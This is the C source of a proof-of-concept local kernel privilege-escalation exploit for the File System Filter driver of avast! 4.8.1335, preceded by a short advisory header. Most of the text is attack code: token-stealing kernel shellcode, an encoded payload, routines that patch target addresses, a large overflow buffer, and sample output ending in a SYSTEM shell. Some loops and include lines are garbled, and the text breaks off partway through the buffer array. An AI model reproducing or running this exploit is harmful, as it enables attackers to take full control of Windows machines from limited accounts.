#include #include #include #include #include #include /* Program : avast! 4.8.1335 Professionnel Homepage : http://www.avast.com Discovery : 2009/07/29 Author Contacted : 2009/07/31 Found by : Heurs This Advisory : Heurs Contact : heurs@ghostsinthstack.org //----- Application description avast! antivirus software represents complete virus protection, offering full desktop security including a resident shield. This antivirus is certified by both ICSA Labs and West Coast Labs Checkmark. //----- Description of vulnerability The File System Filter driver is prone to a local kernel buffer overflow. This vulnerability allows an intruder to gain SYSTEM privileges on a Windows system from a limited user account. //----- Proof Of Concept http://www.sysdream.com/LocalEscalation_Avast.rar //----- Credits http://www.sysdream.com http://ghostsinthestack.org s.leberre at sysdream dot com heurs at ghostsinthestack dot org //----- Greetings Virtualabs //-----Exploitation ############################################### Avast Kernel Buffer Overflow Vulnerability Proof Of Concept... ===> Found : LocalEscalation_Avast.exe : 2676 Shellcode PID Uploaded ! Shellcode Redirect Uploaded ! Shellcode Stack Uploaded ! Connecting... Found ! Handle : 0000001C Microsoft Windows XP [version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\eleve\Bureau>whoami SYSTEM ############################################### */ char UpdateAswMon [] = { 0x5E, 0x81, 0xEE, 0x6B, 0x03, 0x00, 0x00, 0x81, 0xC6, 0x30, 0x9E, 0x00, 0x00, 0xC7, 0x06, 0x00, 0x00, 0x00, 0x00 }; char ShellcodeMaster[] = "\x33\xf6\x33\xff\x64\xa1\x24\x01\x00\x00\x8b\x40\x44\x05\x88\x00" "\x00\x00\x8b\xd0\x8b\x58\xfc\x81\xfb\x41\x41\x41\x41\x75\x02\x8b" "\xf0\x83\xfb\x04\x75\x02\x8b\xf8\x8b\xd6\x23\xd7\x85\xd2\x75\x08" "\x8b\x00\x3b\xc2\x75\xde\xeb\x10\x8b\xc7\xb9\x40\x00\x00\x00\x03" "\xc1\x8b\x00\x8b\xde\x89\x04\x19\xba\x11\x11\x11\x11\xb9\x22\x22" "\x22\x22\xb8\x3b\x00\x00\x00\x8e\xe0\x0f\x35"; char RealShellcode[] = "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x15" "\xf3\x1d\xb8\x83\xeb\xfc\xe2\xf4\xe9\x1b\x59\xb8\x15\xf3\x96\xfd" "\x29\x78\x61\xbd\x6d\xf2\xf2\x33\x5a\xeb\x96\xe7\x35\xf2\xf6\xf1" "\x9e\xc7\x96\xb9\xfb\xc2\xdd\x21\xb9\x77\xdd\xcc\x12\x32\xd7\xb5" "\x14\x31\xf6\x4c\x2e\xa7\x39\xbc\x60\x16\x96\xe7\x31\xf2\xf6\xde" "\x9e\xff\x56\x33\x4a\xef\x1c\x53\x9e\xef\x96\xb9\xfe\x7a\x41\x9c" "\x11\x30\x2c\x78\x71\x78\x5d\x88\x90\x33\x65\xb4\x9e\xb3\x11\x33" "\x65\xef\xb0\x33\x7d\xfb\xf6\xb1\x9e\x73\xad\xb8\x15\xf3\x96\xd0" "\x29\xac\x2c\x4e\x75\xa5\x94\x40\x96\x33\x66\xe8\x7d\x8d\xc5\x5a" "\x66\x9b\x85\x46\x9f\xfd\x4a\x47\xf2\x90\x70\xdc\x3b\x96\x65\xdd" "\x15\xf3\x1d\xb8"; int GetPidByName(char * name_Proc) { PROCESSENTRY32 PEntry; HANDLE hTool32; PEntry.dwSize = sizeof(PROCESSENTRY32); hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hTool32 == INVALID_HANDLE_VALUE) { printf("\nError ==> CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)"); getch(); exit(0); } if(!Process32First(hTool32, &PEntry)) { printf("\nError ==> Process32First(hTool32, &PEntry)"); getch(); exit(0); } if (!strcasecmp(PEntry.szExeFile, name_Proc)) { printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); return PEntry.th32ProcessID; } //printf( "\n Process : PID\n"); while(Process32Next(hTool32, &PEntry) != 0){ if (strcasecmp(PEntry.szExeFile, name_Proc) == 0) { CloseHandle(hTool32); printf("===> Found : %s : %d\n\n", PEntry.szExeFile, PEntry.th32ProcessID); return PEntry.th32ProcessID; } //printf("===> Trouver : %s : %d\n", PEntry.szExeFile, PEntry.th32ProcessID); } printf("\n%s n'a pas ete trouve.", name_Proc); getch(); exit(0); } void MajShellcode(char * ProcessName){ DWORD ProcessID; DWORD MagicWord = 0x41414141; int i; ProcessID = GetPidByName(ProcessName); for (i=0; i> 8; ShellcodeMaster[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16; ShellcodeMaster[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24; printf("Shellcode PID Uploaded !\n"); return; } } printf("Shellcode PID NOT Uploaded :\'(\n"); return; } void MajRealShellcode(){ int i; DWORD MagicWord = 0x11111111; for (i=0; i> 8; ShellcodeMaster[i+2] = ((DWORD) &RealShellcode & 0x00FF0000) >> 16; ShellcodeMaster[i+3] = ((DWORD) &RealShellcode & 0xFF000000) >> 24; printf("Shellcode Redirect Uploaded !\n"); return; } } printf("Shellcode Redirect NOT Uploaded :\'(\n"); return; } int FindStack(){ __asm__( "mov %eax, %esp\n\t" "leave\n\t" "ret\n\t" ); } void MajRealStack(){ int i; DWORD MagicWord = 0x22222222; DWORD StackLocation = FindStack(); for (i=0; i> 8; ShellcodeMaster[i+2] = ((DWORD) &StackLocation & 0x00FF0000) >> 16; ShellcodeMaster[i+3] = ((DWORD) &StackLocation & 0xFF000000) >> 24; printf("Shellcode Stack Uploaded !\n"); return; } } printf("Shellcode NOT Uploaded :\'(\n"); return; } void AfficherListeFichiers(void) { HANDLE hFind; WIN32_FIND_DATAW FindData; char Dossier[1024]; // Change de dossier SetCurrentDirectory(Dossier); // DÈbut de la recherche hFind=FindFirstFileW(L"*.*", &FindData); if (hFind!=INVALID_HANDLE_VALUE) { // Si le fichier trouvÈ n'est pas un dossier mais bien un fichier, on affiche son nom printf("%ws\n",FindData.cFileName); // Fichiers suivants while (FindNextFileW(hFind, &FindData)) { printf("%ws\n",FindData.cFileName); } } // Fin de la recherche FindClose(hFind); } int __cdecl main(int argc, char* argv[]) { HANDLE hDevice = (HANDLE) 0xffffffff; DWORD NombreByte; DWORD InitVal=0; char welcome[1024], out[50]; DWORD Crashing []={ 0x73d1dde9, 0x24135758, 0xcd62b301, 0x35a96b72, 0x45c3745d, 0xcfae802b, 0xed77fbb8, 0xecc2f16d, 0xa6409255, 0x5b608056, 0x7b2e40db, 0xc250e10c, 0x284fc4b1, 0xbab9b00d, 0x2fce932c, 0x42d9380b, 0x72b21bd3, 0x4646eb4c, 0xdfcc6996, 0x4060e991, 0xce1fa555, 0xeda7ae0b, 0x4f918340, 0x90059feb, 0xf4cf7bb7, 0x8b0c9a64, 0x9b99f867, 0xd673970a, 0x591dbc4c, 0x2d54989b, 0xddb9c19d, 0x8121eaac, 0x199b21f5, 0xc30a1e03, 0x7c618cb1, 0xeb3e06f0, 0x7cebbd74, 0xaef8a969, 0x25cdcda9, 0xf47297c9, 0x58855260, 0x9b494eaa, 0x0c11e290, 0x4f1a6361, 0x75063159, 0xc791bf70, 0x3a1751db, 0xf439049a, 0x83abe375, 0xba84ad33, 0x3ca8acac, 0x17d3fd7e, 0x319c0280, 0xcd69a6c1, 0x3fdcdfe6, 0xc3903332, 0x1377c51c, 0x1cd14365, 0xa98d77f0, 0xd5746f3f, 0xb3cb7cb2, 0xddd2ecf4, 0x6cb9baa0, 0x4b0e045a, 0x98b7c236, 0x1203e0e5, 0x32449810, 0xaeb428f7, 0xa2e7e6e3, 0x3b0443af, 0x1145d62b, 0xaff5c263, 0xc496b3d7, 0x0b1c45d9, 0x8a463e85, 0x041251c8, 0x1341294d, 0xacc885c9, 0x03c3b5e7, 0x4cd36063, 0xbeec4324, 0x313554a7, 0x3b202113, 0xe836e635, 0x5d65c8bd, 0x8d52bae6, 0x24b3ba7f, 0x9b781fa7, 0x7efa8335, 0x73e87501, 0x316fcbe4, 0xfcc446bc, 0x3697162d, 0x5f706b56, 0x3d74846f, 0x57b41e55, 0x44b39b19, 0x40e6bf38, 0xa1d3527c, 0x20f6b70c, 0xa772ce22, 0x876cdf3b, 0xa948a3ad, 0x054c9fd6, 0x6ea65a25, 0x432a376f, 0x4217baa1, 0xd38f0661, 0x2c40d3d8, 0x33a62f9a, 0x5a8ef7d8, 0x4d07effa, 0x8ba68789, 0x1441d661, 0xf2f6d48f, 0x77e5d2ae, 0xcc69ac3e, 0x26cc9de9, 0xd7518e7e, 0xc568abea, 0x21089cf3, 0xdc3c48a5, 0x6110d1b2, 0x39f65dc9, 0xd0b8055d, 0xd8cab72c, 0x26be700a, 0x5f028b6c, 0x1af4a25d, 0xbae98a7c, 0x1d5e94ed, 0xb743fb4a, 0x274eaede, 0xe84bc6c6, 0xbcc3dd24, 0x47c6b5d5, 0x3f5a530f, 0x4bbd205e, 0xe5ed455d, 0xc23908e3, 0xa7255550, 0xfeee9e59, 0x8d91a28c, 0x27f1cd56, 0xbb7d2468, 0x2e53ae6f, 0x3d8ea58a, 0x9832f31e, 0x87aca912, 0xf5607f93, 0x67e4d74e, 0xcffd3adf, 0x38bda32a, 0x1ace8bf1, 0x16ad790d, 0xe7b78a4a, 0x6e4a4f52, 0xa963805f, 0xb44512ab, 0xaaff642a, 0x68723e9a, 0x9cb006f2, 0x73439f5a, 0xcca9abc0, 0x755ec72c, 0xb90d959c, 0x96f5fed2, 0x54821cac, 0x6d3b9e97, 0x254fa473, 0xe5806bdf, 0x1d3fe779, 0x5d824e9c, 0x0cba2490, 0x86dafdd4, 0xb84d19dd, 0x1cf0ecc5, 0x73a4c777, 0x6545b564, 0x12fc70dd, 0x58357dcd, 0x70524921, 0xa4bf0661, 0xd3630be2, 0xb4f95085, 0x2f8e9f3f, 0x8fb2c303, 0x5d534373, 0x330ed7be, 0x090a7fee, 0x70a0936f, 0x91bc5628, 0x2ad2a9fb, 0x437d15d2, 0xcb860a99, 0x8bbf5d22, 0x5188ce41, 0xf419337b, 0xfe338d2c, 0xf397167d, 0xb79f4c9a, 0x982b7bd0, 0xeda0e308, 0x19079984, 0x44506743, 0x08eb3bff, 0x0b2c7b5e, 0xfc12c449, 0x122c18c3, 0xcb18effc, 0x65070b56, 0x5bbc5f36, 0xba194a66, 0x1ac6b812, 0x4936b720, 0x3064f4d9, 0xea85383a, 0x5669ab43, 0xbfb9b2be, 0x2c961814, 0x2a16193f, 0x5310fc35, 0x2dcf5351, 0x8fb793bf, 0x0b4f51df, 0x7f9c69f8, 0x76bbd7bc, 0xc2cd8ee9, 0xdaded21e, 0xeeb83782, 0xa45e26a1, 0xa94133c2, 0xaec536ad, 0xa6026a8c, 0xbcb5a191, 0xd7babca3, 0xb2d31f46, 0x19511dc1, 0x21437e92, 0x0bfaa87e, 0x32685945, 0x55016b49, 0x994f9293, 0x599f9653, 0xc492d42b, 0xfa4d8907, 0x6c1e0416, 0x073e9847, 0x9ceee897, 0x479dec42, 0x60f26898, 0xa0b37906, 0x7f433088, 0xe617b52a, 0x30df4460, 0x9945c0da, 0x5f4f9196, 0x5b3095ad, 0x41e4f285, 0x225b324a, 0xe5f83ba7, 0xbadf8b56, 0xc732f28d, 0xaa94e0d7, 0x0f9da105, 0x80936817, 0xa3b40d2e, 0xa7d5791c, 0x10b0a9bb, 0x83b95622, 0x32872694, 0x7b1b3d10, 0xe0e1adf8, 0x32512498, 0x6bc6ff89, 0x0d11fef7, 0x3875c984, 0x5a31db0e, 0xdd1df94b, 0x61148636, 0x7372b587, 0x8856950e, 0x4f0af062, 0xb49ea480, 0x799ce35e, 0x23ecabd9, 0x137ee004, 0xdd17f948, 0xf2026141, 0x8afd0e45, 0x1188ac9a, 0x0f87f038, 0xee43edef, 0x982bf738, 0x78b3ca5f, 0x4d8345d3, 0x613e2505, 0x16ab7e08, 0xa7e68888, 0xa59d234c, 0x61655904, 0xbec0d39c, 0x3d0d18b0, 0x8eb7a653, 0x6bd2ad6f, 0x3fa66b0f, 0x5951c36f, 0x8e5c4bed, 0x087d3d72, 0x65fdb9b3, 0x7aa0c8a5, 0x26c78496, 0x3a8946f1, 0xb65f63b2, 0xeacb180d, 0xbda32816, 0x424f7b1e, 0x667fb713, 0xfe8d6f2c, 0x7f3711ca, 0x477ecf54, 0xbf36b283, 0x92a7518e, 0xfa378a84, 0x9ddc8f83, 0xc844b947, 0x3ef9ab12, 0xe892b5b4, 0x101854b2, 0x8f45e397, 0xa1b134ed, 0x5c2a4d5c, 0xa887258a, 0xbea01c90, 0xfb77c826, 0x08e87f98, 0x6c7b0709, 0x1f27fe7d, 0xe9d4d75f, 0xd3ecbaee, 0x961a35c6, 0x8317caf4, 0xc93141a0, 0x71c2fa12, 0x79afe953, 0x7024a929, 0x5187beec, 0x439aa4c4, 0x1b5bf729, 0x20de52a2, 0x5afd531b, 0xcbc6d1dc, 0x8a6c775d, 0x93823634, 0x31e3c106, 0x5c4756ec, 0xb322318f, 0x8a8fe323, 0x7d8a483f, 0x538d06a5, 0xd23e0864, 0x07739d15, 0x46845d65, 0xa90ed2a1, 0x907709ae, 0x25c51a18, 0x7b361c60, 0xf7f12530, 0xb5c8b862, 0x1e5579b7, 0x453fde63, 0x5854951c, 0xb479e4b4, 0x0187185f, 0xe310f406, 0xc5ae83f5, 0x385149c8, 0xe0538b56, 0x6ffa1c0f, 0x15a8c111, 0xb901feb0, 0x5cb53fcf, 0x7b9596dd, 0xbedc1ead, 0x6ea7517e, 0xf1c88cdb, 0x2cf213af, 0x67ebce96, 0x458465ce, 0x6503c018, 0xf7d61a9b, 0xbb31a712, 0xe0dc951b, 0x354a28a8, 0x51ecebf3, 0xdbf8e424, 0xd71a0cd2, 0x708d5b40, 0xdd1cf833, 0xb4be28a4, 0x41c589c0, 0x5d81889f, 0x97de9f7a, 0x43b18278, 0x4c312b46, 0x2ec1048d, 0x438d30d9, 0xab7923d6, 0xd36d6ed0, 0xb6165ede, 0x95369795, 0xd5b1b776, 0x60fe0b11, 0x087563ae, 0xa709eacf, 0xededbbea, 0xf134d8ea, 0x1e241ce6, 0x341248d6, 0x6c16117a, 0x7517ff23, 0x4dfb2eda, 0x7cc84423, 0x96cf942d, 0x32901498, 0xe3bc3a5d, 0x0b85bdb2, 0x7baf09ca, 0x6c7b4c01, 0xb3a72934, 0x4d33e464, 0x7dc1cf69, 0x166756c6, 0x08f5f62f, 0x3db6b309, 0xce886208, 0x1daf5a03, 0xc724741a, 0xf052f4ed, 0x4297acad, 0xdc6a5dfe, 0xd0c4a895, 0x97db4437, 0x6e227c97, 0x05f4dab0, 0x13b4adf4, 0x0d8b71e6, 0x9ff6843d, 0x0fdb8939, 0x58850dfd, 0x2b21f28e, 0x2603e115, 0xb09ba646, 0xd6fe719b, 0xe87a9223, 0x18f3b642, 0x4fb62852, 0xeda5dd40, 0x6e5dbbf4, 0x703a2f1f, 0x4884a549, 0xb6b85046, 0xdbbb7868, 0xa38e09a3, 0x66c6fa13, 0xea16a377, 0x1ced6fd3, 0x44a3e920, 0xfe995619, 0x822d3af3, 0xe8399736, 0xa6ff023c, 0x19b88da8, 0x9b26e290, 0xc6970f3e, 0x4607d070, 0x7db5bfd9, 0xbdcc2cd7, 0x946faaf6, 0xfcd89b65, 0x17712dee, 0x953a0c3f, 0xf1383334, 0xc32e8a92, 0xeb678cf4, 0xb5265c91, 0x10ec1b31, 0x6d134dc1, 0x8ae8143e, 0x26ff3968, 0xf579d43c, 0x8f9d85f3, 0x02fad6bf, 0x3a7be637, 0xeff5542c, 0x71cd227a, 0x4345de8e, 0x5c9202c7, 0x388f640c, 0x0de7d2cd, 0xe9b74263, 0xe443d4ef, 0x9cabf0e1, 0x810b8762, 0x23c14d38, 0x296bd907, 0xdfc31794, 0x026b9455, 0x7632bccd, 0x8dcf7332, 0x23dcc4c2, 0x32885977, 0x548fdcc5, 0x9fca128a, 0x294fbc82, 0xf7bcd7db, 0x9cdcc0a9, 0xe26aec68, 0x04c39cf4, 0x0a8d0d2b, 0xf72bdf30, 0xff04366a, 0x07e7b40a, 0x9b3b9d18, 0x859b4b85, 0x53a44769, 0x0b1366e3, 0x39f4c10b, 0xb1ccbe45, 0x9d31874e, 0xa8e0a3a6, 0x98d4a7d0, 0xc24240f5, 0x421301e0, 0x09137099, 0x48d2a2dd, 0x3f0fdb4a, 0xe1a9eb43, 0x84199aff, 0x4eff2f35, 0xd52f92fd, 0xe99cb709, 0xcb8fc9ce, 0x4cd97110, 0x035f2194, 0x87e8e12d, 0xecd7a018, 0xff80434f, 0x5ad4430c, 0x51015613, 0x153a3cf8, 0x8bbb9e84, 0x31bc1b01, 0x986e7b5e, 0x4708de0c, 0xe51a3ef6, 0xd279b566, 0x4054b421, 0xd794d868, 0x5e174bd2, 0xc9480f43, 0x61e1ac80, 0x65c89d78, 0xcc461265, 0x6f8099a7, 0x76596a5c, 0xe134710e, 0x6ec09d49, 0x095b4232, 0x251f6d2c, 0xb61f7712, 0x6031640c, 0x081bb50e, 0xabfcf1aa, 0x303d79f3, 0x4e3caaa9, 0xf87540ed, 0xf067072c, 0xe1e7f3a1, 0x82dd570b, 0x2110f555, 0x988cc833, 0x985002b4, 0xedd3b5c3, 0xf952a2cd, 0x06159e37, 0x1ac3e607, 0xda6888dc, 0x534a76c9, 0x2a7a4148, 0xb5433071, 0x392f077a, 0x4f91ca6e, 0x0c7736e0, 0x780dd6ed, 0x626f3aa9, 0x26db5cac, 0xd12bc3e6, 0x70d14be1, 0x0bc60171, 0x97203228, 0x66463a8d, 0x0ac460d4, 0xdf1906b3, 0x0d19058b, 0xaa96fa9a, 0x8b220888, 0xfad29e31, 0x90049f60, 0xb44780ab, 0xe52554ea, 0xe97a3e9e, 0x2142a187, 0x6ba5f497, 0xf43334a9, 0xf9fb1c87, 0x3d1f1949, 0x064149d5, 0x2e39a1e9, 0x35669c1b, 0x0345c538, 0x623002d5, 0xa280da3a, 0xd32bc66c, 0x047c437f, 0x2b60c09c, 0x154931e8, 0x2b316b42, 0xa97028bb, 0x1b26881f, 0x0d93499d, 0xa681e3d0, 0x64aed3a1, 0xb904296b, 0x6e8ef9c5, 0xc029dbe4, 0x4c1968ca, 0xacceed0c, 0x0f137d05, 0x71b80cdb, 0xd0e3a334, 0xab958932, 0x336c6a26, 0x42626069, 0x2a2d154b, 0x14347b3a, 0xac80cd31, 0x9e9708d5, 0x1641542a, 0x25d2dd4e, 0x5c434b1d, 0x070569b9, 0xf0f63b05, 0x2e8328a8, 0xd263cf7b, 0xea1a2370, 0xcbc81d0b, 0xf2a0075b, 0x141c700e, 0x10628529, 0x6cec92e5, 0x4aa5f3d6, 0x6c3d960f, 0x942d9d60, 0x896d6d23, 0xa29ef00b, 0x0502a28d, 0x712f7787, 0x5235ed70, 0x8945f3eb, 0x4f1ecbdd, 0xb5f457b9, 0xe7327495, 0xbdc47980, 0x85bf54c1, 0xe054753d, 0x42e6c82b, 0xb54389bb, 0xef5debf3, 0xcf310c8e, 0x2a433c26, 0xf209dc9d, 0x8a869d03, 0x45961943, 0x28f51bb9, 0x643e865c, 0xb410b2d1, 0xaf30a98c, 0xa004bb79, 0x956b7c41, 0x13e3a21d, 0xca5f4efd, 0xf13e81c1, 0x4fb74a1e, 0x2a033efb, 0x91ed2e36, 0xb9bf8c57, 0xc1b65238, 0x2b3b3e0f, 0xbc02c76b, 0xc56d0a7d, 0xb33685c2, 0x6619d068, 0x13ceb219, 0x21e2d381, 0xbc04a013, 0xafc763ef, 0xc6c9651d, 0x9139fb86, 0xdd6fe175, 0x5334d9d7, 0x4b39bc0e, 0x42035a82, 0x91cba15e, 0xcf931d84, 0x739e2767, 0x5a1c76fd, 0xd65cb444, 0x02c608e9, 0xc13aa613, 0x5f9895ec, 0x05928739, 0xd960be14, 0xbc65f387, 0xb40abdb8, 0x3833c113, 0x1fa8b468, 0x8e907e66, 0xbca30fa5, 0xef539907, 0x3f130c64, 0xaf133b06, 0x06d0d5c8, 0xe3e4f1df, 0x185f733d, 0x7ecf9d1e, 0xdfea3362, 0x33bedbe3, 0xe9a15aed, 0x4aa68eeb, 0x01e0aaf1, 0xb5ccf205, 0x9426c4cc, 0x3f80b9b4, 0x017b584a, 0x7ac85b06, 0x4ca27f77, 0x7d8548a2, 0x19025a74, 0x1d4d204c, 0x0cccb981, 0xf86a72e6, 0x2a5ef939, 0x778bfe20, 0xf536a9e7, 0x82482d36, 0x20a8484b, 0x8c08dd85, 0xc82a0739, 0xed52e038, 0x4e6f5973, 0xd799c606, 0x87dd5c7f, 0x69db7ac2, 0x56771978, 0xf682c73f, 0x40e5511c, 0xf373bc10, 0xdecc0fa4, 0xf070df4e, 0x81b33f54, 0xf1d53816, 0x2c2173e5, 0xae5a23d2, 0x0b9013fd, 0x9005857b, 0x495aa603, 0x7d7b69b9, 0x80603698, 0xeedd2b37, 0xaf7f72ea, 0xbe303f21, 0x0ea977f9, 0x0fa0708b, 0xb5792aa6, 0x87fd2a7e, 0x2bda1cd6, 0x5df64225, 0x216accb9, 0xc1808941, 0x582679b3, 0x46fbd44d, 0xe2f76929, 0x548f6e51, 0x4ac3f5d8, 0xe52e62af, 0x484110c2, 0x492fab5a, 0x2c7accea, 0x7488ca20, 0xe36a2f99, 0xba1e3785, 0xefa467bc, 0xd4665fc8, 0x2f5390e2, 0xfe450203, 0xbb624253, 0x551740a0, 0x7d50b6c9, 0xe9d20aa0, 0x55e69c01, 0x6ab186ee, 0x1c187ff3, 0x6ce6dff2, 0x120a6ce0, 0xf6c45fd2, 0x5832b533, 0xb02e3027, 0x170d3041, 0x6f153144, 0xad980d7f, 0x49f5d3ab, 0xcedca059, 0x3db83dc5, 0x39c589c0, 0x986e3537, 0xc4d04f1d, 0xd71ee166, 0x04620370, 0x35beb3cf, 0x39249667, 0x79915fe2, 0xbe40d4da, 0xd0cab338, 0xdcb53b5a, 0xae884be7, 0x6250a5df, 0x0949574e, 0x5d5321b8, 0x86d01394, 0xd517473b, 0xe5f90827, 0x7a8ef843, 0x19869984, 0x02e8d858, 0x71954f6f, 0x6a9e300b, 0xa8a50e6b, 0xb935e9e2, 0x69f3e080, 0x3e51ad9b, 0xf485aa30, 0x4195eb53, 0x2574950c, 0x87c2c9f1, 0x955cecec, 0x2a89e224, 0x67aed18a, 0x8d473f2a, 0xa089d921, 0x50197424, 0xa94cacbd, 0xe8cddf16, 0x806b7f0d, 0xa27648b9, 0x99c702ad, 0x37db9034, 0xe7295b46, 0xa4bf4bac, 0x43d214a3, 0x8d9bc127, 0x2f72faa5, 0xf9143ef4, 0xf30bd7bf, 0x86b2517d, 0xb7a833d6, 0x037c9b1f, 0x9459bc14, 0x0c78aa23, 0xe41cc7dc, 0x4eda2ed2, 0x8c0a8f08, 0x85a8aff4, 0xae28e3ea, 0x217269d6, 0x6d221bf7, 0x6f646c75, 0x8c04d0eb, 0x7d389030, 0x1968785b, 0xe748befe, 0x7fb277a8, 0xf340540e, 0xf5a6340f, 0x47113529, 0x0c2eab43, 0xd20d8b05, 0x5306c40e, 0x9c0c1ad3, 0x52a384db, 0x26ad4373, 0x30872280, 0xc5ef9754, 0x098568fa, 0xcbc632de, 0x9efa321a, 0x8466cae3, 0x156fa462, 0x96716caa, 0x3e7cd39b, 0x27506529, 0x34cac20d, 0x05958b0a, 0xe3b1708f, 0x258ff2e9, 0x913cc9cb, 0xa5899577, 0xb9885e7b, 0xa559f53e, 0x48d99696, 0xf2d0826d, 0x0be5f805, 0x385bb433, 0x174121eb, 0x58bfd2bd, 0x4f4bc6ff, 0xc8fb45a6, 0xfac1da99, 0xcbb0841f, 0xd33a2a83, 0xdb808b49, 0x110544d1, 0x3656b868, 0x9527fb34, 0x75d35656, 0xf683f9cc, 0xe756e3f6, 0x8cf742c1, 0x60c64989, 0x2af6cecc, 0x0c70ddbb, 0x761077ee, 0xa5b3e47e, 0x52939e81, 0xa476a7db, 0x02afdf28, 0x181e76a1, 0x094c8ae4, 0x2035542d, 0xc47a48ab, 0x5f344e89, 0x6c0eaf8d, 0xed89747c, 0x718af660, 0xed1386e1, 0xfe37f3d2, 0x06817e6b, 0x600c9381, 0xbab81e8f, 0xe7a49506, 0xb5070118, 0x2cf72a58, 0xde08c7f4, 0x109eead3, 0x38ca65ba, 0xab924774, 0x26e006f2, 0x52fc4fc1, 0x2c4453a1, 0x700a621d, 0x014dc1dc, 0x3aef70de, 0x7c87331d, 0x89433add, 0xcbf6a8fc, 0x114f4794, 0xea4e637f, 0x723c4b76, 0x47cc4f6a, 0x87445530, 0xe83ceb38, 0x4d3e048e, 0x79081724, 0x4bf787fb, 0x68943c66, 0x40e3d968, 0x6b103a30, 0xaadd17d4, 0xb3f839e8, 0xac84edf7, 0x931d53b1, 0x0c4d2a0e, 0x2f6ce387, 0xfed92391, 0x69ee2a6e, 0x48d7bb98, 0x0ba1cb35, 0x63e12f67, 0x1ce3cb82, 0x099b3a46, 0x5839b9a4, 0x7f7f4993, 0x59e4ecea, 0xeea5cccd, 0x447dbf7f, 0xcd8626e1, 0x8d36d4b0, 0xac9e19ec, 0x797ab5d7, 0x8434b658, 0xbcec7ef7, 0x682c6d93, 0x762d7c86, 0xf38c8099, 0xafdec42c, 0xc43d09a6, 0xe49d1217, 0x5e747fe1, 0x24788bb3, 0xaefc2937, 0x1932f03c, 0x683917c0, 0x66aeed2b, 0x9b18cdd7, 0x33f680a8, 0x26951569, 0xbaee16a8, 0x9e6c211f, 0x2588853b, 0x9f46290f, 0x246ae851, 0x18e204f6, 0x4904ec8f, 0xd90aa3f4, 0xb32d3c27, 0x4c5dc284, 0xbe4add7f, 0x43d09da9, 0x89c17c35, 0x073879e7, 0xa563a12e, 0x8a89202c, 0xf15e9e1f, 0x351c54d9, 0xa0c4fa14, 0x5709de8d, 0x39186894, 0x6d04f1d9, 0xf11330f7, 0x81d6fb36, 0xa9ed69cb, 0xc6d525a7, 0x7a95ed1d, 0x0e3cc7ca, 0xf22396d8, 0x454bc69f, 0x220c180f, 0x413b363d, 0x3034f3b4, 0xd29d8cf2, 0x54f88e88, 0x48701702, 0xd3bc5e71, 0x7d13dd70, 0x3c60d934, 0x2f11eff3, 0xc0bfff93, 0xfa8a47f7, 0x1ae1ec5d, 0xc5ebdc87, 0xe0f9d5ac, 0xf205ec31, 0x45bf5abb, 0x364757d1, 0xe17d0824, 0x7285cdad, 0x340f876f, 0xafd04fb5, 0x232b2753, 0x9ed7abb0, 0xf6fa5267, 0xd0344840, 0x7e1908c7, 0xa7fa0e2a, 0xa14a1f1c, 0x207f4d88, 0x3a8e8949, 0x0933e39b, 0x49308b91, 0x744b2e05, 0x8dd691b5, 0x576003b6, 0x74bf728b, 0x8ec344ea, 0x5c1a8d38, 0xba05b772, 0xd025c49e, 0xbe9bde06, 0x791d3fde, 0xaac66591, 0x4fd06cb7, 0x1eb57393, 0x3a132e66, 0x531bed33, 0xc1161373, 0x584522c2, 0x96427532, 0x9b324e67, 0x67fd675e, 0x1ca506c6, 0xfec4ce3f, 0xdfbd6229, 0x1570062a, 0xaf2e42ce, 0x442de8ae, 0xe9da28c2, 0xd8661dd6, 0xb1fbabfd, 0x5e3b5bd4, 0x5975312a, 0x727c7734, 0x6edaf6d6, 0xc1c54cf1, 0x0a906333, 0x81c044d6, 0x38ea12fe, 0x0c1bf270, 0x57818362, 0x0908d11c, 0x0e5a84ec, 0xadc85814, 0x54e8aa92, 0xd07c83f7, 0xcc71c686, 0x640e2cbb, 0x03c636a6, 0x47737c01, 0x9ad77ee7, 0xd179e1a9, 0x8340bb15, 0x489ed205, 0x40b54fa8, 0x7afb505e, 0xc04f8e16, 0xb92981c6, 0x604af99f, 0x43c0fd25, 0x1d2b625f, 0x13f4dcd7, 0xcf47b89b, 0x108d824a, 0x21236797, 0x4cac84a5, 0xb33821ce, 0x542a9975, 0xf66135c2, 0x30b9634a, 0x9bde472a, 0x50e29c43, 0x1224e64d, 0x140aa049, 0x48c6d7eb, 0xf171704c, 0x80987f37, 0x88da2c1d, 0xf337fbfe, 0xd52f414a, 0x76581549, 0x75d22530, 0x293f3f41, 0x20b6cf21, 0xccd9f240, 0x46ddeacd, 0x4e16d64e, 0x0e64fe89, 0x445de8d3, 0x4d7983a6, 0x9f44fe8c, 0xf4e56281, 0xa7aad55b, 0x07270a01, 0x77501d16, 0xf848ee54, 0x34f4ba27, 0x244da047, 0x0ca62989, 0xbb5e2e05, 0x9612ca12, 0x1b7c8cc7, 0xd2d672e6, 0x0caac1da, 0x1ae2cf8a, 0x92bd47e9, 0xfeb1f194, 0xc0628cbd, 0xecc1a399, 0x1a9f95f0, 0x29648b2b, 0x9c447a54, 0xad6d85e2, 0x9bd983e7, 0x880f0eb1, 0xbea4a1a9, 0x3717e013, 0x89e486dd, 0xe86bcc12, 0xc43fe5a5, 0xc50a72b4, 0x396f4517, 0x2c8b865e, 0x3f022a7f, 0x0c5bc9bb, 0x13fd077b, 0xcb6bd83d, 0x20c3e64b, 0x254e3a66, 0xbcb22492, 0x57caa096, 0x8ba670d9, 0x547d5784, 0xec8bf3f8, 0xf5b1ff55, 0x30620957, 0x43a3264a, 0xdc6a0482, 0x270f2162, 0x15518268, 0xf4f3d923, 0xfc6cdb9e, 0x91d3e097, 0xe49d4ba4, 0xe47a3b34, 0xc18383a6, 0x5508af9a, 0xf2c8fcc8, 0xed417653, 0xe3f4cf27, 0x6a777f65, 0xe9c3dae6, 0xfec2e74c, 0x143f7e6d, 0xa8dc757c, 0xb8c48b07, 0x6a41964d, 0x0994e2e4, 0x86ba5562, 0x4ebdb204, 0x6913dc92, 0x3bd205a8, 0x2018395a, 0x804c5bb8, 0xa159fa18, 0x7ccdfb1e, 0x146c6abc, 0x9c59a9ce, 0xe2f7d37d, 